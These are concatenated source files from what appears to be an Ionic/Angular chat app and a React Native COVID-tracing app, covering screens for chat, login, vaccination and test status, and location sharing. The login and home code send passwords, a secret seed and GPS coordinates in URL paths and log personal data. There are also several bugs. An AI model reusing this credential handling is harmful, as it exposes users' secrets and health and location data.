}).slice(0, 3).join(', ') + ' and ' + (msg.cpLength - 3) + ' other' + (msg.cpLength > 4 ? 's' : '');
}
}
});
}
openMessageModal(){
// let modal = this.modalCtrl.create(ModalContentPage);
// modal.present;
// this.nav.push(ModalContentPage);
this.navCtrl.push(ModalContentPage);
}
viewMessage(item){
console.log('item is following:'+JSON.stringify(item));
let chatparticipantsarray;
chatparticipantsarray = item.chatParticipants;
chatparticipantsarray = chatparticipantsarray.map(function (conn) {
return conn.encSiebelNr;
});
console.log('encsibel is'+chatparticipantsarray);
this.navCtrl.push(ChatPage,{"stateParamId":item.msgId,"encsiebelvalue":chatparticipantsarray,'chatparticipants':chatparticipantsarray});
}
}
<file_sep>import { Component, OnInit, ViewEncapsulation ,ViewChild} from '@angular/core';
import { ModalController,NavController, Nav,NavParams} from 'ionic-angular';
import { NativeStorage } from '@ionic-native/native-storage';
import { AlertController } from 'ionic-angular';
import { LoadingController } from 'ionic-angular';
import { MessageService } from '../../../services/message.service';
import * as _ from 'underscore/underscore';
@Component({
selector: 'page-chat',
templateUrl: 'chat.html',
providers:[MessageService]
})
export class ChatPage implements OnInit{
private paramid:string = '';
public messageContainer:any = {};
public chatParticipantLabel:string = '';
public encsiebleid:any;
//public timestampdirection:any = 0;
private response:any = [];
private errorMessage:any = '';
public userInfo = {};
public messages = [];
public participants = [];
public startRecord = 0;
public messageLoaded = false;
public msgId = '';
public newMessage = {
message: '',
attachedImages: [],
autoLinkerList:[]
};
public oldestMessageTimeStamp = 0;
public latestMessageTimeStamp = 0;
constructor(public navCtrl: NavController,public navParams: NavParams,private messageService:MessageService,private nativeStorage: NativeStorage,public alertCtrl: AlertController,public loadingCtrl: LoadingController,public modalCtrl: ModalController) {
this.paramid = navParams.get('stateParamId');
this.chatParticipantLabel = navParams.get('Titletoshow');
this.encsiebleid = navParams.get('encsiebelvalue');
this.participants = navParams.get('chatparticipants');
console.log('paramid value jere'+this.paramid);
console.log('encsible value jere'+this.encsiebleid);
if(this.paramid == '' || this.paramid == undefined){
this.messageContainer.msgtitle = this.chatParticipantLabel;
this.messageContainer.encsibleidvalue = this.encsiebleid;
}
// else if( this.encsiebleid != null && this.encsiebleid!=undefined){
// this.messageContainer.encsibleidvalue = this.encsiebleid;
// }
}
doRefresh(refresher) {
//console.log('Begin async operation', refresher);
this.nativeStorage.getItem('AuthResponse')
.then(
data => {
this.messageService.getMessageThread(this.paramid,this.oldestMessageTimeStamp,'oldest',data).subscribe(
response => {
refresher.complete();
console.log('response data'+JSON.stringify(response.data.messageThread));
if (response.data.messageThread !== null) {
this.messages = this.messages.concat(response.data.messageThread);
console.log('messages are'+this.messages);
if (response.data.messageThread.length > 0)
this.oldestMessageTimeStamp = response.data.messageThread[response.data.messageThread.length - 1].updatets;
_(this.messages).forEach(function(val) {
val.author.imageUrl = _.find(this.participants,
function (o) {
return o.siebelNr === val.author.siebelNr;
}).pictureUrl;
});
}
},
err => {
refresher.complete();
let alert = this.alertCtrl.create({
title: 'Message Failure',
subTitle: err,
buttons: ['OK']
});
alert.present();
this.errorMessage = <any>err;
});
},
error => console.error(error)
);
}
ngOnInit(){
//console.log('navparamid is:'+this.paramid);
if(this.paramid == undefined || this.paramid == ''){
// this.messageContainer = this.messageService.getMessageContainer();
// console.log('message contaniner'+JSON.stringify(this.messageContainer));
}else{
let loader = this.loadingCtrl.create({
content: "Please wait...",
duration: 3000,
dismissOnPageChange: true
});
loader.present();
this.nativeStorage.getItem('AuthResponse')
.then(
data => {
this.messageService.getMessageThread(this.paramid,'','',data).subscribe(
response => {
if (response.data.messageThread.length > 0) {
this.latestMessageTimeStamp = response.data.messageThread[0].updatets;
this.oldestMessageTimeStamp = response.data.messageThread[response.data.messageThread.length - 1].updatets;
}
this.messages = response.data.messageThread;
this.messageService.getMessageParticipants(this.paramid,data).subscribe(
response => {
this.participants = response.data.targetPeople;
if (this.participants.length <= 3) {
this.chatParticipantLabel = this.participants.map(function(cp) {
if (cp === undefined)
{
return '';
}
return cp.firstName;
}).join(', ');
} else {
this.chatParticipantLabel = this.participants.map(function(cp) {
if (cp === undefined)
{
return '';
}
return cp.firstName;
}).slice(0, 3).join(', ') + ' and ' + (this.participants.length - 3) + ' other' + (this.participants.length > 4 ? 's' : '');
}
_(this.messages).forEach(function(val) {
val.author.imageUrl = _.find(this.participants,
function (o) {
return o.siebelNr === val.author.siebelNr;
}).pictureUrl;
});
},
err => {
let alert = this.alertCtrl.create({
title: 'Message Failure',
subTitle: err,
buttons: ['OK']
});
alert.present();
this.errorMessage = <any>err;
});
},
err => {
let alert = this.alertCtrl.create({
title: 'Message Failure',
subTitle: err,
buttons: ['OK']
});
alert.present();
this.errorMessage = <any>err;
});
},
error => console.error(error)
);
}
}
replyMessage(messageText){
if(messageText = '')
return;
messageText = this.newMessage.message;
let loader = this.loadingCtrl.create({
content: "Please wait...",
duration: 3000,
dismissOnPageChange: true
});
loader.present();
messageText = messageText.replace(/ /g, ' ');
this.nativeStorage.getItem('AuthResponse')
.then(
data => {
console.log('messageContainer'+JSON.stringify(this.messageContainer));
if(Object.keys(this.messageContainer).length>0){
this.messageService.sendMessage(messageText,this.newMessage.message['autolinkerlist'],this.messageContainer.encsibleidvalue,data).subscribe(
response => {
//console.log('response is:'+JSON.stringify(response));
this.paramid = response.data.messageVO.msgId;
if(this.paramid != '' || this.paramid!=undefined){
this.messageContainer = {};
}
setTimeout (() => {
this.newMessage.message = '';
messageText = '';
this.newMessage.autoLinkerList = [];
}, 500)
},
err => {
let alert = this.alertCtrl.create({
title: 'Message Failure',
subTitle: err,
buttons: ['OK']
});
alert.present();
this.errorMessage = <any>err;
});
}else{
this.messageService.replyMessage(messageText,this.newMessage.message['autolinkerlist'],this.paramid,data).subscribe(
response => {
console.log('reply response is achieved:');
this.newMessage.message = '';
messageText = '';
this.newMessage.autoLinkerList = [];
setTimeout(() => {
console.log('latest timestamp is:'+this.latestMessageTimeStamp);
this.messageService.getMessageThread(this.paramid,this.latestMessageTimeStamp,'latest',data).subscribe(
response => {
console.log('latest response is:'+JSON.stringify(response));
if (response.data.messageThread !== null) {
this.messages = this.messages.concat(response.data.messageThread);
if (response.data.messageThread.length > 0)
this.latestMessageTimeStamp = response.data.messageThread[0].updatets;
_(this.messages).forEach(function (val) {
val.author.imageUrl = _.find(this.participants,
function (o) {
return o.siebelNr === val.author.siebelNr;
}).pictureUrl;
});
}
},
err => {
let alert = this.alertCtrl.create({
title: 'Message Failure',
subTitle: err,
buttons: ['OK']
});
alert.present();
this.errorMessage = <any>err;
});
}, 500);
},
err => {
let alert = this.alertCtrl.create({
title: 'Message Failure',
subTitle: err,
buttons: ['OK']
});
alert.present();
this.errorMessage = <any>err;
});
}
},
error => console.error(error)
);
}
}<file_sep>// Imports
import { Injectable } from '@angular/core';
import { Http, Response, Headers, RequestOptions } from '@angular/http';
import { Observable } from 'rxjs/Observable';
// Import RxJs required methods
import 'rxjs/add/operator/map';
import 'rxjs/add/operator/catch';
import 'rxjs/add/operator/toPromise';
import 'rxjs/add/observable/throw'
@Injectable()
export class AuthService {
// Resolve HTTP using the constructor
constructor (private http: Http) {}
// private instance variable to hold base url
private authUrl = 'https://mobileauthqa.ieee.org/v1/auth/IEEE-Collabratec';
authenticateUser(usernamevalue,passwordvalue):Observable<any>{
//let payload = {username:usernamevalue,password:<PASSWORD>};
let payload = "username="+usernamevalue+"&password="+<PASSWORD>;
let headers = new Headers({'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8','Origin':'https://mobileauthqa.ieee.org','Referer':'https://mobileauthqa.ieee.org/','Accept':'*' }); // ... Set content type to JSON
//console.log('payload is'+payload);
let options = new RequestOptions({ headers: headers}); // Create a request option
return this.http.post(this.authUrl,payload,options) // ...using post request
.map(this.extractData) // ...and calling .json() on the response to return data
.catch(this.handleError); //...errors if any
}
private extractData(res:Response) {
let body = res.json();
return body || [];
}
private handleError(error:any) {
// In a real world app, we might use a remote logging infrastructure
// We'd also dig deeper into the error to get a better message
//console.log('error is'+JSON.stringify(error));
let errMsg = (error.message) ? error.message :
error.status ? `${error.status} - ${error.statusText}` : 'Server error';
console.error(errMsg); // log to console instead
return Observable.throw(errMsg);
}
}<file_sep>import { Component, OnInit, ViewEncapsulation } from '@angular/core';
import { ModalController,NavController } from 'ionic-angular';
import { NativeStorage } from '@ionic-native/native-storage';
import { AlertController } from 'ionic-angular';
import { LoadingController } from 'ionic-angular';
import { MessageService } from '../../services/message.service';
import { ChatPage } from '../../pages/message/chat/chat';
import * as _ from 'underscore/underscore';
@Component({
selector:'page-content-modal',
templateUrl:'message-modal.html',
providers:[MessageService]
})
export class ModalContentPage{
public connections:any = [];
private response:any = [];
private errorMessage:any = '';
public selectedConnections:any = [];
private connectiondatalist:any = [];
public confirmed:boolean = false;
public firstname:string = '';
//private preparedConnections:any = [];
constructor(public navCtrl: NavController,private messageService:MessageService,private nativeStorage: NativeStorage,public alertCtrl: AlertController,public loadingCtrl: LoadingController,public modalCtrl: ModalController) {
}
ngOnInit(){
let loader = this.loadingCtrl.create({
content: "Please wait...",
duration: 3000,
dismissOnPageChange: true
});
loader.present();
this.nativeStorage.getItem('AuthResponse')
.then(
data => {
let key = '';
let pageno = 1;
let preparedConnections = [];
this.firstname = data.property['auth-data'].givenName;
console.log('fistname'+this.firstname);
this.messageService.getYourConnections(key,pageno,10,'N', 'N', 'N', 'N', 'N',data).subscribe(
response => {
this.connections = response.data.connectionList;
let connectionsvalue = this.selectedConnections;
if (this.connections !== null) {
preparedConnections = this.connections.map(function (item) {
var isSelected = _.some(connectionsvalue, { 'encSiebelNr': item.encSiebelNr });
return {
'name': item.fullName,
'firstName': item.firstName,
'imageUrl': item.pictureUrl,
'encSiebelNr': item.encSiebelNr,
'checked': isSelected
};
});
}
//console.log('prepared connections:'+JSON.stringify(preparedConnections));
this.connections = preparedConnections;
this.connectiondatalist = preparedConnections;
},
err => {
let alert = this.alertCtrl.create({
title: 'Message Failure',
subTitle: err,
buttons: ['OK']
});
alert.present();
this.errorMessage = <any>err;
});
},
error => console.error(error)
);
}
getItems(ev:any){
// set val to the value of the searchbar
this.connections = this.connectiondatalist;
let val = ev.target.value;
// if the value is an empty string don't filter the items
if (val && val.trim() != '') {
this.connections = this.connections.filter((item) => {
return (item.name.toLowerCase().indexOf(val.toLowerCase()) > -1);
})
}
}
addToSelected(item){
let checkboxvalue = this.confirmed;
if (!item.checked) {
for(let i = 0;i<this.selectedConnections.length;i++){
if(this.selectedConnections[i].encSiebelNr === item.encSiebelNr){
this.selectedConnections.splice(this.selectedConnections.indexOf(item),1);
}
}
} else {
this.selectedConnections.push(item);
}
}
createNew(){
let participants =
this.selectedConnections.map(function (conn) {
return conn.firstName;
});
//console.log('this firstname :'+this.firstname);
participants.push(this.firstname);
let msgTitle = participants.join(', ');
// let titleencarray = [];
// this.messageService.(msgTitle,
//console.log('this selected are:'+JSON.stringify(this.selectedConnections));
let encsiebel = this.selectedConnections.map(function (conn) {
return conn.encSiebelNr;
});
// titleencarray.push(encsiebel);
// titleencarray.push(msgTitle);
//console.log('participants are:'+participants);
this.navCtrl.push(ChatPage,{'Titletoshow':msgTitle,'encsiebelvalue':encsiebel,'stateParamId':''});
}
}
|
aa90b595dc889b6f47417a7b355913c51032ad18
|
[
"TypeScript"
] | 6
|
TypeScript
|
mobigaurav/Ionic2
|
09d7b4f9da60190f0b767979885077bac8db15fc
|
bc02364714ac78416049ad7c31610254a7acb440
|
refs/heads/master
|
<file_sep>import React, { useRef, useEffect, useState } from "react";
import { Animated, Text, View, Image, StyleSheet } from "react-native";
import {
Card,
ListItem,
Button,
// Icon,
Tile,
Overlay,
Avatar,
Divider,
} from "react-native-elements";
import QRCode from 'react-native-qrcode-svg';
import AsyncStorage from "@react-native-async-storage/async-storage";
import { ScrollView } from "react-native-gesture-handler";
import { AppLoading } from "expo";
import { useFonts } from "expo-font";
import { sha256 } from "react-native-sha256";
import Icon from "react-native-vector-icons/FontAwesome5";
// import RNLocation from 'react-native-location';
import * as Location from 'expo-location';
export default ({ navigation }) => {
const [seed, setSeed] = useState("");
const [seedInfo, setSeedInfo] = useState("");
const [iAddress, setIAddress] = useState("");
const [location, setLocation] = useState([0,0]);
const [fname, setFname] = useState("");
const [sname, setSname] = useState("");
const [email, setEmail] = useState("");
const [password, setPassword] = useState("");
const [dob, setDOB] = useState("");
const [idnum, setIDnum] = useState("");
// const [placeofbirth, setPlaceOfBirth] = useState("");
// const [nationality, setNationality] = useState("");
// const [residence, setResidence] = useState("");
const [address, setAddress] = useState("");
const [phone, setPhone] = useState("");
const [visible, setVisible] = useState(false);
const [showProfile, setShowProfile] = useState(false);
const [hash, setHash] = useState("");
const [vaccinated, setVaccinated] = useState(0);
const [vaccineResults, setVaccineResult] = useState([]);
const [testResults, setTestResult] = useState([]);
const [lastResult, setLastResult] = useState(false);
const [tested, setTested] = useState(0);
const [vaccHash, setVaccHash] = useState([])
const [TestHash, setTestHash] = useState([])
const [nearby_pos, setNearbyPos] = useState(false);
// RNLocation.configure({
// distanceFilter: 1.0, // Meters
// desiredAccuracy: {
// ios: "best",
// android: "highAccuracy"
// },
// })
const toggleOverlay = () => {
setVisible(!visible);
};
const toggleProfile = () => {
setShowProfile(!showProfile);
};
// var profile = {
// Seed: seed,
// FirstName: fname,
// LastName: sname,
// Email: email,
// DateOfBirth: dob,
// GovernmentID: idnum,
// ResidentialAddress: address,
// ContactNumber: phone,
// };
var profile = {
address: iAddress
}
useEffect(() => {
(async () => {
try {
let { status } = await Location.requestPermissionsAsync();
if (status !== 'granted') {
setErrorMsg('Permission to access location was denied');
return;
}
var local_seed = await AsyncStorage.getItem("seed");
var local_info = await AsyncStorage.getItem("seedInfo");
var iadd = await AsyncStorage.getItem("address");
setSeed(local_seed);
setSeedInfo(local_info);
setIAddress(iadd);
var obj_info = JSON.parse(local_info);
console.log("Local Info = ", obj_info);
setEmail(obj_info.Profile.email);
setFname(obj_info.Profile.fname);
setSname(obj_info.Profile.sname);
setDOB(obj_info.Profile.dob);
// setPlaceOfBirth(await AsyncStorage.getItem("birth"));
// setNationality(await AsyncStorage.getItem("nationality"));
// setResidence(await AsyncStorage.getItem("residence"));
setAddress(obj_info.Profile.address);
setIDnum(obj_info.Profile.idnum);
setPhone(obj_info.Profile.phone);
console.log("Patient Address = ", iadd);
let vaccinationArray = [];
var vaccineResult = await fetch(`https://itrace-middleware.herokuapp.com/getAllHash/${iadd}&0&VACCINATION`);
vaccineResult = await vaccineResult.json();
console.log("Vaccination Result =", vaccineResult);
if (vaccineResult != false) {
for (var i = 0; i < vaccineResult.length; i++) {
var responseTx = await fetch(`https://itrace-middleware.herokuapp.com/getTx/${vaccineResult[i].toString()}`);
var resObjTx = await responseTx.json();
if (resObjTx.response !== false) {
console.log(resObjTx.response)
vaccinationArray.push(resObjTx.response)
}
}
setVaccHash(vaccineResult)
setVaccinated(1);
setVaccineResult(vaccinationArray);
} else {
setVaccinated(2);
}
var testArray = [];
var testResult = await fetch(
`https://itrace-middleware.herokuapp.com/getAllHash/${iadd}&0&COVIDTEST`
);
testResult = await testResult.json();
console.log("Tests Result =", testResult);
if (testResult != false) {
for (var i = 0; i < testResult.length; i++) {
var responseTx = await fetch(`https://itrace-middleware.herokuapp.com/getTx/${testResult[i].toString()}`);
var resObjTx = await responseTx.json();
if (resObjTx.response !== false) {
console.log(resObjTx.response)
testArray.push(resObjTx.response)
}
}
setTestHash(testResult);
setTested(1);
setTestResult(testArray);
var last = testArray[0];
// var status = JSON.parse(last.message);
console.log("Status = ", last);
setLastResult(last.result);
} else setTested(2);
// cons
let loc = await Location.getCurrentPositionAsync({accuracy: Location.LocationAccuracy.BestForNavigation});
console.log("Location = ", loc);
let locArr = [loc.coords.longitude, loc.coords.latitude];
setLocation(locArr);
var addLoc = await fetch(`https://itrace-middleware.herokuapp.com/addLocation/${local_seed}&${loc.coords.longitude}&${loc.coords.latitude}`);
var nearbyLoc = await fetch(`https://itrace-middleware.herokuapp.com/getAllLocations/${local_seed}`);
nearbyLoc = await nearbyLoc.json();
console.log("Nearby Location Result = ", nearbyLoc);
if(nearbyLoc != false)
setNearbyPos(true)
} catch (e) {
console.log("Error in Final Catch = ", e);
}
})();
}, []);
return (
<View style={styles.container}>
{/* <View style={{position:'relative', top:0, flexDirection:'row', width:'100%', marginBottom:20}}>
<View style={{position:"absolute", right:5}}>
<Button
icon={
<Icon
name="user"
size={20}
color="#2E86C1"
solid
style={{marginLeft:5}}
/>
}
iconRight
buttonStyle={{width:100, backgroundColor:'#E1E9EA', }}
title="Profile"
titleStyle={{color:'#2E86C1'}}
onPress={() => setShowProfile(true)}
></Button>
</View>
</View> */}
{/* <View style={{zIndex:1, width:'100%'}}> */}
{/* <ScrollView horizontal={false} showsVerticalScrollIndicator={true} style={{zIndex:1, width:'100%'}}> */}
<Text style={[styles.text, {fontSize:30}]}>Hello {fname} !</Text>
<Text style={[styles.text, {fontSize:20, color: (tested==1)&&(!lastResult) ? "#229954":"#C0392B"}]}>You Are {(tested==1)&&(!lastResult) ? "": "NOT"} Eligible For Plasma Donation</Text>
<Text style={[styles.text, {fontSize:20, color: (nearby_pos) ? "#C0392B":"#229954"}]}>
{nearby_pos ? "There Might Be A COVID Patient Around Your. Wear Your Mask" : "There is No COVID Positive Around You"}
</Text>
<View
style={styles.infoContainer}
>
<Text
style={{
position: "relative",
left: 10,
top: 10,
marginBottom: 0,
color:'white',
fontWeight: "600",
}}
>
VACCINATION STATUS
</Text>
<Divider style={styles.mainDivider} />
<View style={{ margin: "auto", marginTop: 20 }}>
<Icon
name= {(vaccinated === 1 || vaccinated === 2) ? "syringe" : "spinner"}
size={30}
color={(vaccinated === 1) ? "#1E8449" : ((vaccinated === 2) ? "#CB4335" : "#F1C40F")}
solid
style={{ position: "absolute", right: 0 }}
/>
<Text
style={[
styles.text,
{ color: (vaccinated === 1) ? "#1E8449" : ((vaccinated === 2) ? "#CB4335" : "#F1C40F"), position: "relative", textAlign:'left', left: 0, fontWeight: "700", },
]}
>
{(vaccinated === 1) ? `Your are\nVaccinated` : ((vaccinated === 2) ? `You are\nNOT Vaccinated` : `Checking Vaccination\nStatus`)}
</Text>
{(vaccinated === 1) && <Text
style={[
styles.text,
{ color: "#229954", position: "relative", textAlign:'left', fontSize: 10 },
]}
>
Address = {vaccHash[0]}
</Text>}
</View>
</View>
{/* COVID TEST BOX */}
<View
style={styles.infoContainer}
>
<Text
style={{
position: "relative",
left: 10,
top: 10,
marginBottom: 0,
color:'white',
fontWeight: "600",
}}
>
TEST STATUS
</Text>
<Divider style={styles.mainDivider} />
<View style={{ margin: "auto", marginTop: 20 }}>
<Icon
name={(tested === 0) ? 'spinner' : ((tested === 1) ? (lastResult ? "virus" : "virus-slash") : "times-circle")}
size={30}
color={(tested === 0) ? '#F1C40F' : ((tested === 1) ? (lastResult ? "#E74C3C" : "#27AE60") : "#CB4335")}
solid
style={{ position: "absolute", right: 0 }}
/>
<Text
style={[
styles.text,
{
fontWeight: "700",
// fontSize: 20,
color: (tested === 0) ? '#F1C40F' : ((tested === 1) ? (lastResult ? "#E74C3C" : "#27AE60") : "#CB4335"),
position: "relative", textAlign:'left', left:0
},
]}
>
{(tested === 0) ? `Checking Your\nTest Status` : ((tested === 1) ? (lastResult ? `Positive\nCOVID Result` : `Negative\nCOVID Result`) : `Not Taken\nTest Yet`)}
</Text>
{(tested === 1) &&<Text
style={[
styles.text,
{ color: "#229954", position: "relative", textAlign:'left', fontSize: 10, },
]}
>
Address = {TestHash[0]}
</Text>}
</View>
</View>
<View>
<View style={{ height: 20 }}></View>
<View style={styles.btnContainer}>
<Button
title="Show My QR"
icon={
<Icon
name="qrcode"
size={20}
color="white"
solid
style={{position:'absolute', right:20}}
/>
}
iconRight
onPress={toggleOverlay}
buttonStyle={[
styles.button,
{ marginBottom:20 },
]}
/>
<Button
icon={
<Icon
name="user"
size={20}
color="white"
solid
style={{position:'absolute', right:20}}
/>
}
iconRight
buttonStyle={[styles.button, { marginBottom:20 }]}
title="My Profile"
// titleStyle={{color:'#2E86C1'}}
onPress={() => setShowProfile(true)}
></Button>
<Button
icon={
<Icon
name="sign-out-alt"
size={20}
color="white"
solid
style={{position:'absolute', right:20}}
/>
}
iconRight
buttonStyle={[styles.button, {backgroundColor:'#C0392B'}]}
title="Logout"
// titleStyle={{color:'#2E86C1'}}
onPress={async() => {
await AsyncStorage.clear();
navigation.navigate("Welcome")
}}
></Button>
{/* <Button
title="Scan QR Code"
icon={
<Icon
name="search"
size={20}
color="white"
solid
style={{position:'absolute', right:20}}
/>
}
iconRight
onPress={() => navigation.navigate("Scan")}
buttonStyle={styles.button}
/> */}
</View>
<Divider style={styles.mainDivider} />
<View style={{ height: 20 }}></View>
<Overlay isVisible={visible} onBackdropPress={toggleOverlay}>
<QRCode logoSize={400} value={JSON.stringify(profile)} />
</Overlay>
{/* <Button
title="Authority Mode"
icon={
<Icon
name="exchange-alt"
size={20}
color="white"
solid
style={{position:'absolute', right:20}}
/>
}
iconRight
onPress={() => navigation.navigate("AddRecord")}
buttonStyle={styles.button}
/> */}
<Overlay isVisible={showProfile} onBackdropPress={toggleProfile} >
<View style={styles.container, {backgroundColor: '#1F618D', padding:50}}>
<Text style={[styles.subtext]}>Name</Text>
<Text style={styles.text}>
{fname} {sname}
</Text>
<Divider style={styles.mainDivider} />
<Text style={styles.subtext}>Email</Text>
<Text style={styles.text}>{email}</Text>
<Divider style={styles.mainDivider} />
<Text style={styles.subtext}>Date Of Birth</Text>
<Text style={styles.text}>{dob}</Text>
<Divider style={styles.mainDivider} />
<Text style={styles.subtext}>Government ID</Text>
<Text style={styles.text}>{idnum}</Text>
<Divider style={styles.mainDivider} />
{/* <Text style={styles.subtext}>Place Of Birth</Text>
<Text style={styles.text}>{placeofbirth}</Text>
<Divider style={styles.mainDivider} />
<Text style={styles.subtext}>Nationality</Text>
<Text style={styles.text}>{nationality}</Text>
<Divider style={styles.mainDivider} />
<Text style={styles.subtext}>Country of Residence</Text>
<Text style={styles.text}>{residence}</Text>
<Divider style={styles.mainDivider} /> */}
<Text style={styles.subtext}>Address</Text>
<Text style={styles.text}>{address}</Text>
<Divider style={styles.mainDivider} />
<Text style={styles.subtext}>Phone Number</Text>
<Text style={styles.text}>{phone}</Text>
</View>
</Overlay>
{/* */}
</View>
{/* </ScrollView> */}
{/* </View> */}
</View>
);
};
const styles = StyleSheet.create({
container: {
flex: 1,
backgroundColor: "#2C3E50",
alignItems: "center",
justifyContent: "center",
margin:'auto',
// paddingTop: 50,
paddingHorizontal: 0,
borderWidth: 0,
borderColor: "#273157",
},
btnContainer: {
flexDirection: "column",
alignSelf: "center",
marginBottom: 20,
},
button: {
backgroundColor: "#2980B9",
color: "white",
width: 250,
height:40,
margin: 5,
alignSelf:'center',
borderRadius: 90,
borderWidth: 2,
borderColor: "white",
},
btnText:{
position:'absolute',
left:20
},
text: {
// fontFamily: "Varela",
color: "#F0F3F4",
textAlign: "center",
fontSize: 20,
},
subtext: {
// fontFamily: "Metropolis",
color: "gray",
textAlign: "left",
fontSize: 20,
fontWeight: "bold",
},
image: {
position:'absolute',
bottom: 0,
width: "100%",
height: 100,
zIndex:0
// alignSelf: "center",
// marginBottom: 50,
},
subDivider: {
backgroundColor: "gray",
marginVertical: 10,
height: 2,
width: 200,
alignSelf: "center",
opacity: 0.1,
},
mainDivider: {
backgroundColor: "gray",
marginTop: 10,
height: 2,
width: "90%",
alignSelf: "center",
},
infoContainer: {
// marginHorizontal: 0,
borderWidth: 2,
borderColor: "#27AE60",
borderRadius: 20,
marginTop:20,
marginHorizontal:20,
width:'90%',
paddingHorizontal:20,
paddingBottom:20,
// flexDirection: "column",
}
});
<file_sep>import React, { useRef, useEffect, useState } from "react";
import { Animated, Text, View, Image, StyleSheet } from "react-native";
import { Input, Button } from "react-native-elements";
import { AppLoading } from "expo";
import { useFonts } from "expo-font";
import AsyncStorage from "@react-native-async-storage/async-storage";
import Icon from "react-native-vector-icons/FontAwesome5";
import Spinner from "react-native-loading-spinner-overlay";
// You can then use your `FadeInView` in place of a `View` in your components:
export default ({ navigation }) => {
const [processing, setProcessing] = useState(false);
const [cnic, setCnic] = useState("");
const [password, setPassword] = useState("");
const getData = async () => {
try {
const localEmail = await AsyncStorage.getItem("email");
const localPass = await AsyncStorage.getItem("password");
if (
localEmail !== null &&
localPass !== null &&
localEmail === email &&
localPass === password
) {
return true;
} else {
return false;
}
} catch (e) {
console.log("Error in Getting Data");
}
};
const loginBtn = async () => {
try {
setProcessing(true);
var seed = await fetch(
`https://itrace-middleware.herokuapp.com/getSeed/${cnic}&${password}`
);
var parsedSeed = await seed.json();
if (parsedSeed[0]) {
await AsyncStorage.setItem("seed", parsedSeed[1].SEED);
await AsyncStorage.setItem("seedInfo", JSON.stringify(parsedSeed[1]));
var doctorAddress = await fetch(
`https://itrace-middleware.herokuapp.com/getAlphaAddress/${parsedSeed[1].SEED}`
);
doctorAddress = await doctorAddress.json();
await AsyncStorage.setItem("address", doctorAddress.ADDRESS);
setProcessing(false);
navigation.navigate("Home");
} else {
setProcessing(false)
alert("Login Failed");
}
} catch (e) {
setProcessing(false);
alert("Error While Loggin In");
console.log("Error in Logging In ", e);
}
};
return (
<View style={styles.container}>
<Spinner
visible={processing}
textStyle={[styles.text, { color: "white" }]}
textContent={"Please Wait while You Are Logged In"}
/>
<Text
style={[
styles.text,
{
fontSize: 20,
fontWeight: "700",
position: "absolute",
top: 50,
},
]}
>
Please Fill Below Information
</Text>
<View style={{ zIndex: 1, width: "80%" }}>
<Input
placeholder="CNIC Without Dashes"
keyboardType="numeric"
label="CNIC"
onChangeText={(value) => setCnic(value)}
style={styles.input}
/>
<Input
label="Password"
placeholder="<PASSWORD>"
style={styles.input}
secureTextEntry={true}
onChangeText={(value) => setPassword(value)}
/>
<Button
icon={
<Icon
name="sign-in-alt"
size={20}
color="white"
solid
style={{ position: "absolute", right: 20 }}
/>
}
iconRight
buttonStyle={[styles.button, { alignSelf: "center" }]}
title="Login"
onPress={async () => await loginBtn()}
></Button>
</View>
</View>
);
};
const styles = StyleSheet.create({
container: {
flex: 1,
backgroundColor: "#2C3E50",
alignItems: "center",
justifyContent: "center",
margin:'auto',
paddingTop: 0,
paddingHorizontal: 0,
borderWidth: 0,
borderColor: "#273157",
zIndex:2
},
image: {
position: "absolute",
bottom: 0,
width: "100%",
height: 100,
zIndex: 0,
},
button: {
backgroundColor: "#196F3D",
color: "white",
width: 150,
height:40,
margin: 5,
borderRadius: 90,
borderWidth: 2,
borderColor: "#52BE80",
},
btnText:{
position:'absolute',
left:20
},
text: {
// fontFamily: "Varela",
color: "#F0F3F4",
textAlign: "center",
fontSize: 20,
},
input: {
borderRadius: 90,
borderColor: "#D3D4D5",
borderWidth: 2,
paddingHorizontal: 10,
marginBottom: 10,
},
});
<file_sep>import React, { useRef, useEffect } from 'react';
import { Animated, Text, View, Image, StyleSheet} from 'react-native';
import { Card, ListItem, Button, Icon } from "react-native-elements";
import { AppLoading } from 'expo';
import { useFonts } from 'expo-font';
// You can then use your `FadeInView` in place of a `View` in your components:
export default ({navigation}) => {
let [fontsLoaded] = useFonts({
// Load a font `Montserrat` from a static resource
'Righteous': require('./../assets/fonts/Righteous-Regular.ttf'),
'Secular': require('./../assets/fonts/SecularOne-Regular.ttf'),
'Nunito': require('./../assets/fonts/Nunito-Regular.ttf'),
'Poppins': require('./../assets/fonts/Poppins-Regular.ttf'),
'NunitoBold': require('./../assets/fonts/Nunito-Bold.ttf'),
'PoppinsBold': require('./../assets/fonts/Poppins-Bold.ttf'),
'NunitoBlack': require('./../assets/fonts/Nunito-Black.ttf'),
'PoppinsBlack': require('./../assets/fonts/Poppins-Black.ttf'),
'MetropolisBlack': require('./../assets/fonts/Metropolis-Black.otf'),
'MetropolisBold': require('./../assets/fonts/Metropolis-Bold.otf'),
'MetropolisSemiBold': require('./../assets/fonts/Metropolis-SemiBold.otf'),
'Metropolis': require('./../assets/fonts/Metropolis-Regular.otf'),
});
{
return (
<View style={styles.container}>
<FadeInView style={styles.text}>
<Text style={[styles.text, {fontWeight:"900", fontSize: 30 }]}>Profile</Text>
</FadeInView>
</View>
)
}
}
const styles = StyleSheet.create({
container: {
flex: 1,
backgroundColor: "#2C3E50",
alignItems: "center",
justifyContent: "center",
margin:'auto',
paddingTop: 0,
paddingHorizontal: 0,
borderWidth: 0,
borderColor: "#273157",
zIndex:2
},
button: {
backgroundColor: "#196F3D",
color: "white",
width: 150,
height:40,
margin: 5,
borderRadius: 90,
borderWidth: 2,
borderColor: "#52BE80",
},
btnText:{
position:'absolute',
left:20
},
text: {
// fontFamily: "Varela",
color: "#F0F3F4",
textAlign: "center",
fontSize: 20,
},
image:{
flex: 1,
width: undefined,
height: undefined
}
});<file_sep>import React, { useRef, useEffect, useState } from "react";
import { Animated, Text, View, Image, StyleSheet } from "react-native";
import { Input, Button } from "react-native-elements";
import { AppLoading } from "expo";
import { useFonts } from "expo-font";
import AsyncStorage from '@react-native-async-storage/async-storage';
import { ScrollView } from "react-native-gesture-handler";
import Spinner from "react-native-loading-spinner-overlay";
import Icon from 'react-native-vector-icons/FontAwesome5';
// You can then use your `FadeInView` in place of a `View` in your components:
export default ({ navigation }) => {
const [vaccineeID, setVaccineeID] = useState('');
const [vaccinatorID, setvaccinatorID] = useState('');
const [testeeID, setTesteeID] = useState('');
const [testerID, setTesterID] = useState('');
const [location, setLocation] = useState('');
const [date, setDate] = useState('');
const [txType, setTxType] = useState('VACCINATION')
const [hasCovid, setHasCovid] = useState(false);
const [processing, setProcessing] = useState(false);
const addVaccine = async (key, value) => {
try {
setProcessing(true)
